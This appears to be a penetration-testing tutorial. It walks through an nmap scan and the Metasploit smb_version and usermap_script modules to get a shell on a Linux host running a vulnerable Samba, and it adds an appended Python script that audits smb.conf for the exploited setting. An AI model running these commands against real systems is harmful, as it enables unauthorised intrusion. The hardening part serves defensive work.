Samba is free software that implements the SMB protocol on Linux and UNIX systems. It consists of server and client programs. The Samba service uses ports 139 and 445. This article briefly introduces how Metasploit is used to break into a remote Linux host through a Samba vulnerability.
Step 1) First, use nmap to scan the ports and services open on the target host. The command is as follows:
nmap -sS -Pn -A 192.168.2.142
Step 2) If ports 139 and 445 are found open on the host, the host may have a remote Samba service overflow vulnerability. Metasploit is required to establish a meterpreter session through these ports.
Step 3) After starting Metasploit, you must first determine the Samba version. The command is as follows:
msf > search scanner/samba
This command searches for Samba-related modules.
Step 4) Run the following commands to select and configure the module used to scan for the Samba version.
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.2.142
This command sets the IP address of the remote host whose Samba version you want to scan.
msf auxiliary(smb_version) > exploit
This command runs the module.
Step 5) After the Samba version is found, it is exploited further to break into the remote Linux host.
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.2.142
msf exploit(usermap_script) > exploit
Running the preceding commands creates a shell session.
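
On the defending side, the Samba configuration of a host like the one above can be checked for the settings this walkthrough relies on. The following is an added example, not part of the original article: a Python audit of smb.conf that flags the `username map script` option (the setting the usermap_script module is named after) and unrestricted exposure of ports 139/445. The helper names, the sample configuration and the script path in it are constructed for illustration.

```python
import re

# Constructed sample smb.conf for illustration; not from a real host.
SAMPLE_CONF = """\
[global]
   workgroup = LAB
   User Name Map Script = /etc/samba/scripts/mapusers.sh
   # hosts allow = 192.168.2.0/24
[public]
   path = /srv/public
"""

def _norm(name):
    # smb.conf ignores case and whitespace inside section and parameter names
    return re.sub(r"\s+", "", name).lower()

def parse_global(text):
    """Return {normalized_name: value} for the [global] section."""
    params, section, pending = {}, None, ""
    for raw in text.splitlines():
        line, pending = pending + raw.strip(), ""
        if line.endswith("\\"):  # trailing backslash continues the line
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = _norm(line[1:-1])
        elif section == "global" and "=" in line:
            name, value = line.split("=", 1)
            params[_norm(name)] = value.strip()
    return params

def audit(text):
    """Return hardening findings (hypothetical helper, added example)."""
    g = parse_global(text)
    findings = []
    if g.get("usernamemapscript"):
        findings.append("username map script is set: " + g["usernamemapscript"])
    if not (g.get("hostsallow") or g.get("allowhosts")):
        findings.append("no global hosts allow: 139/445 accept any client")
    if g.get("bindinterfacesonly", "no").lower() not in ("yes", "true", "1"):
        findings.append("bind interfaces only is off: smbd listens on all interfaces")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_CONF)))
```

An empty result means none of the three conditions was found in the `[global]` section; per-share settings are not evaluated.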